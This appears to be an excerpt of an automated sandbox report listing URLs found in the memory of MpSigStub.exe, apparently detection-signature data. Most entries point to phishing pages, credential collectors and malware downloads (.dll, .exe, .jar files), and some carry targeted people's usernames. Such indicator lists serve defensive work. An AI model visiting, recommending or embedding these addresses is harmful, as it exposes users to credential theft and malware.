Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hard10.authorizeddns.us/1?zved58il3scrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hardx2.mydad.info/1?ef8il3hesscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://help-lolooo.cf/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/ajo/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/egab/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/emzf/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/lin/processor.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://holidayinndarlingharbour-my.sharepoint.com/personal/dos_holidayinndarlingharbour_com_au/_lay
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://holisticxox.com/doc/check.doc
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://holisticxox.com/doc/payment.doc
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://hotel-harmonia.am/images/prettyphoto/login/redirect.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://hrupd00t.rest/kgwdt5pthdawnnewibpybtyht/?i8kka7gioxp=c2f1zglhy2fyz29pddiwmebzyxvkawfjyxjnby5
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://htrzogrzers.com/wed/opo.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hvaclinic.com/redirect/amvhbi1mcmfuy29pcy52yxnzzxvyqgjlzmvzys5jb20=
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dll
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dllx
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://iffusedtrac.xyz/3/bbc.exe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://ikkon.pk/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://immobiliareneri.casa/drms/ind.html
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://indygrace.com/sun/scan-img-rcsh-253018.exe
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://ines-arnshoff.de/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://inetaccelerator.ru/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://institutoimepe.com.br/jl/autooffice2errors
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://integratedcombatcentre.com.au/wp-content/uploads/tmp/outlook365/outlook365/index.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://inter-pipe.ga/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: https://internetbanking.caixa.gov.br/SIIBC/index
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://invoiceadvantagereminder.ew.r.appspot.com/index.html#ivan.tiutiunnyk
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.com
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://iqras.pk/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://iqras.pk/inno/inno/innoc.doc
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/fnchq3
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/p1cyuo
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://itaubankline.itau.com.br/V1/PERS/IMG/bt_confirmar.gif
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://jadr223.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://jaypalsinh.ngsoftweb.eEvvmU%in/OLD_07032021/classeEvvmU%es/PHPExcel/Calculation/Token/pm4Cb7
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://jbrealestategroups.com/wp-content/themes/bridge/extendvc/msg.
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://jdjuwuryh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://jiksh.com/?referrer=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://jusreihnt.com/dpz/?email=
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: https://kelwinsales.com/ds/1702.gif
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://kirimliinsaat.com.tr/ui/office365
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://konzmny.com/?qs=a9537c1ce6614636144ad0c9e0975ac106bb986006db8f6a0789e5b0d16dcf4fc15476ba5afa
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://kweraltd.com/wp-content/plugins
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://l%%8Kvfcrl%%8Kvfyptl%%8Kvfoexpert.work/core/venl%%8Kvfl%%8Kvfdor/doctrine/lexer/lib/cpf9PlDn
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://labrie-sabette.com/wp-includes/sodiu
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://lacoronadela11.com/wp-includes/q/?email=
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://lasvegasmanageditservices.com/oso.php
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: https://legalproceedings.uc.r.appspot.com/legal_proceeding_concerning_overdue_invoices_pdf.jar
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://limarija-das.hr/wp-content/plugins/wp-optimize/js/handlebars/CJrMovjhM.phpMXynE
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: https://linesburline.at/3/bbc.dll
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://linhaansi.com.br/wp-includes/maersk/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: https://liquide.co/3qyyerb6gvx/ind.html
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://listoparacomer.com.ve/wp-content/hewlett-packard-mcafee/hpe.html
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://livelongerfeelbetter.com/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://lmvus.com/omar/90/$8900.doc
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: https://loginmixcrhustim0fficia6.ga/xi/policy.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://main.bgsr.site/wp-rR:/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://manorrestaurantstrasburg.com/wp-zincludez/makdire/emonofhgh/wofjgjbledon/gen2021.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://mareyell.org/sfexp/sfexpdbtrack/sfexss/sfexpress/source/index.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://moegifts.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://mueblesmaple.com.mx/19.gif
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/raw
